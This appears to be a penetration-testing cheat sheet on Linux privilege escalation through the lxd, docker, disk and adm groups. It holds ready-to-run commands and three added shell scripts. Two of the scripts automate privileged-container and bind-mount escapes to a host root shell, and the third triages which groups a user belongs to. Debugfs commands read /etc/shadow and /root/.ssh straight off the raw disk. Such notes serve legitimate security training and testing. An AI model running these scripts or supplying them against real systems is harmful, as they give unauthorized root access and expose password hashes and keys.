PRIMARY CATEGORY → LINUX PRIVESC
Enumeration
id
groups "$USER"
LXC | LXD
Manual Exploitation
Downloading the build-alpine Script
From the Attacker ⚔️
curl --silent --location --request GET 'https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine' --remote-name
Building Alpine
From the Attacker ⚔️
bash ./build-alpine # Run as root (sudo); it writes alpine-v3.X-x86_64-<DATE>.tar.gz to the current directory
Creating the Container
From the Target 🎯
Copy the Alpine tarball to the target first (scp, or python3 -m http.server on the attacker and wget/curl on the target), then:
lxd init # Accept the defaults (or use lxd init --auto); skip it if LXD is already initialised
lxc image import <ALPINE_TAR_GZ> --alias alpine
lxc init alpine privesc -c security.privileged=true # Privileged: uid 0 in the container is uid 0 on the host
lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true # Bind-mount the host root (with sub-mounts)
lxc start privesc
lxc exec privesc sh # Or lxc exec privesc /bin/bash
ExploitDB
Downloading the build-alpine Script
From the Attacker ⚔️
curl --silent --location --request GET 'https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine' --remote-name
Building Alpine
From the Attacker ⚔️
bash ./build-alpine # Run as root (sudo)
Running the Exploit
From the Target 🎯
Transfer the Alpine tarball to the target together with the script; the script imports it and performs the same steps as the manual method above
bash script.bash
Once inside the container, go to /mnt/root: the host's file system is mounted there and, because the container is privileged, it is readable and writable as root (for example /mnt/root/etc/shadow or /mnt/root/root/.ssh/)
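The manual steps above, scripted for the target side, as an added example that is not part of the original notes or of the ExploitDB script. It assumes the tarball produced by build-alpine has already been uploaded to the target, that the caller is in the lxd group, and that the lxc/lxd binaries are in PATH; the container name (privesc), image alias (alpine) and device name (giveMeRoot) are the ones used in the notes.

```shell
#!/bin/sh
# Added example, not part of the original notes: automate the manual LXD steps
# from the target side. Assumes the tarball produced by build-alpine has
# already been copied onto the target and that the caller is in the lxd group.
set -eu

CONTAINER=${CONTAINER:-privesc}   # container name, as in the notes
ALIAS=${ALIAS:-alpine}            # image alias, as in the notes

# Return the most recently modified alpine-*.tar.gz in a directory (default: .),
# i.e. the tarball you just built and uploaded. Fails if there is none.
find_alpine_tarball() {
    dir=${1:-.}
    latest=$(ls -1t "$dir"/alpine-*.tar.gz 2>/dev/null | head -n 1)
    [ -n "$latest" ] || return 1
    printf '%s\n' "$latest"
}

lxd_privesc() {
    tarball=$1
    command -v lxc >/dev/null 2>&1 || { echo "lxc client not found" >&2; return 1; }
    id -nG | tr ' ' '\n' | grep -qx lxd \
        || echo "warning: not in the lxd group, the lxc calls below will probably be denied" >&2

    # No storage pool means LXD was never initialised: do it non-interactively.
    if ! lxc storage list --format csv 2>/dev/null | grep -q .; then
        lxd init --auto
    fi
    # Import the Alpine image once; reuse it if the alias already exists.
    lxc image list --format csv "$ALIAS" | grep -q . \
        || lxc image import "$tarball" --alias "$ALIAS"
    # security.privileged=true: uid 0 inside the container is uid 0 on the host,
    # so the bind-mounted host tree below is fully writable.
    lxc init "$ALIAS" "$CONTAINER" -c security.privileged=true
    # Bind-mount the host root (including sub-mounts) at /mnt/root inside the container.
    lxc config device add "$CONTAINER" giveMeRoot disk source=/ path=/mnt/root recursive=true
    lxc start "$CONTAINER"
    # chroot into the host tree: a root shell with the host's own binaries and /etc.
    lxc exec "$CONTAINER" -- chroot /mnt/root /bin/bash
}

# Run only when explicitly asked, so the file can also be sourced for its functions:
#   RUN_PRIVESC=1 sh lxd_privesc.sh /path/to/tarball/dir
if [ "${RUN_PRIVESC:-0}" = 1 ]; then
    lxd_privesc "$(find_alpine_tarball "${1:-.}")"
fi
```

The final `lxc exec ... -- chroot /mnt/root /bin/bash` lands directly in a root shell on the host file system, which is the same thing as the notes' `lxc exec privesc sh` followed by `cd /mnt/root`, just with the host's own binaries in PATH.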
Docker
If the current user belongs to the docker group, we can spawn a new container and compromise the whole machine by bind-mounting the host's root (/) into the container (for example at /mnt)
This works because the Docker daemon listens on a UNIX socket (by default /var/run/docker.sock) owned by root:docker with mode 660, so both root and members of the docker group can write to it
Therefore a member of the docker group can use the docker command (the Docker client) to send requests to the daemon's REST API without getting a permission denied error; since the daemon itself runs as root, anything the API allows (mounting host paths, privileged containers) happens with root privileges
Alternatively, the docker binary may have the SUID bit set, or the current user may be allowed to run docker via sudo (check sudo -l)
In any case, we create a container with a bind mount so that the host's file system is accessible from inside the container, and chroot into it
docker run --volume /:/mnt --rm --interactive --tty ubuntu chroot /mnt /bin/bash
The image must already be present locally or be pullable; on a target without Internet access pick one from docker images instead of ubuntu. To interact with the Docker Daemon's Socket directly (for example when the docker client is not installed), see Abusing Docker Sockets
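The bind-mount escape above, written so that it also works on a target that cannot pull images, as an added example that is not part of the original notes. It reuses whatever image is already on the box (the output format string is Docker's own Go template syntax; the preference order alpine, busybox, debian, ubuntu is this example's choice) and checks that the daemon is reachable before trying the escape.

```shell
#!/bin/sh
# Added example, not from the original notes: escape to the host through a bind
# mount when the user is in the docker group. Instead of assuming the ubuntu
# image can be pulled, reuse an image that is already present on the target.
set -eu

# Given the output of `docker images --format '{{.Repository}}:{{.Tag}}'`,
# choose an image: prefer a small, well-known base image, otherwise take the
# first one that is not a dangling <none>:<none> layer. Fails if nothing usable.
pick_local_image() {
    listing=$1
    for pref in alpine busybox debian ubuntu; do
        match=$(printf '%s\n' "$listing" | grep -m1 "^${pref}:") \
            && { printf '%s\n' "$match"; return 0; }
    done
    match=$(printf '%s\n' "$listing" | grep -v '<none>' | head -n 1)
    [ -n "$match" ] || return 1
    printf '%s\n' "$match"
}

docker_host_shell() {
    image=$1
    # Pre-flight: can we actually talk to the daemon? If not, show who may.
    if ! docker info >/dev/null 2>&1; then
        echo "cannot reach the Docker daemon (not in docker group, no sudo?)" >&2
        ls -l /var/run/docker.sock >&2 || true
        return 1
    fi
    # --volume /:/mnt bind-mounts the host root into the container; chroot then
    # gives a root shell on the host file system with the host's own binaries.
    docker run --rm --interactive --tty --volume /:/mnt "$image" chroot /mnt /bin/bash
}

# Run only when explicitly asked, so the file can also be sourced for its functions:
#   RUN_PRIVESC=1 sh docker_privesc.sh
if [ "${RUN_PRIVESC:-0}" = 1 ]; then
    image=$(pick_local_image "$(docker images --format '{{.Repository}}:{{.Tag}}')")
    docker_host_shell "$image"
fi
```

Any image works for the escape because the shell that ends up running comes from the host tree under /mnt, not from the image; the image only has to supply a `chroot` binary, which alpine, busybox, debian and ubuntu all do.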
Disk
Members of this group have read/write access to the raw block devices in /dev (they are owned by root:disk), so file system permissions are bypassed: we read the whole file system straight from the disk instead of going through the kernel's permission checks
To do so, we use debugfs (ext2/ext3/ext4); find the root partition first with lsblk or df /
debugfs <DISK> # debugfs /dev/sda1
At the debugfs prompt, cat /etc/shadow prints the file and dump /etc/shadow /tmp/shadow copies it out. Opening the device with debugfs -w makes it writable too (risky on a mounted file system)
ADM
Users belonging to this group can read most logs stored within /var/log/ (auth.log, syslog, web server access logs, application logs), so an attacker could gather sensitive data stored in log files: usernames, passwords typed on the command line or in URLs, session tokens, internal hostnames
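To tie the Enumeration step at the top of the page to the four groups it covers, here is an added triage helper that is not part of the original notes: it parses `id`-style output, reports which of lxd, docker, disk and adm the user is in, and prints the escalation path each one opens. The `stat -c` format and the /dev/sd* and /dev/nvme* device names are assumptions about a typical GNU/Linux target.

```shell
#!/bin/sh
# Added example, not from the original notes: triage the output of `id` for the
# groups covered on this page and print the escalation path each one opens.
set -eu

# Print, one per line and in a fixed order, which of the interesting groups
# appear in an `id`-style string such as
#   uid=1000(bob) gid=1000(bob) groups=1000(bob),4(adm),6(disk),998(docker)
# A trailing SELinux "context=..." field is ignored.
dangerous_groups() {
    id_output=$1
    names=$(printf '%s\n' "$id_output" | sed -n 's/.*groups=//p' | sed 's/ .*//' \
        | tr ',' '\n' | sed 's/^[0-9]*(\(.*\))$/\1/')
    for g in lxd docker disk adm; do
        printf '%s\n' "$names" | grep -qx "$g" && echo "$g"
    done
    return 0
}

# One-line reminder of the technique for each group (the commands from the notes).
privesc_hint() {
    case $1 in
        lxd)    echo "lxd: import an Alpine image, lxc init ... -c security.privileged=true, mount / at /mnt/root" ;;
        docker) echo "docker: docker run --volume /:/mnt --rm -it <image> chroot /mnt /bin/bash" ;;
        disk)   echo "disk: debugfs /dev/sdX1, then cat /etc/shadow" ;;
        adm)    echo "adm: read /var/log/* for credentials and tokens" ;;
        *)      return 1 ;;
    esac
}

# Live triage of the current user, plus who can write to the docker socket and
# the raw disks (the two paths that depend on file permissions, not only on `id`).
triage() {
    for g in $(dangerous_groups "$(id)"); do
        privesc_hint "$g"
    done
    [ -S /var/run/docker.sock ] && stat -c '%A %U:%G %n' /var/run/docker.sock
    ls -l /dev/sd?[0-9] /dev/nvme?n?p? 2>/dev/null || true
}

# Run only when explicitly asked: RUN_TRIAGE=1 sh group_triage.sh
if [ "${RUN_TRIAGE:-0}" = 1 ]; then
    triage
fi
```

Membership is necessary but not sufficient: a user in the docker group on a box where the daemon is not running, or in disk on a box whose devices are not root:disk 660, gets nothing, which is why `triage` also prints the actual permissions on the socket and the block devices.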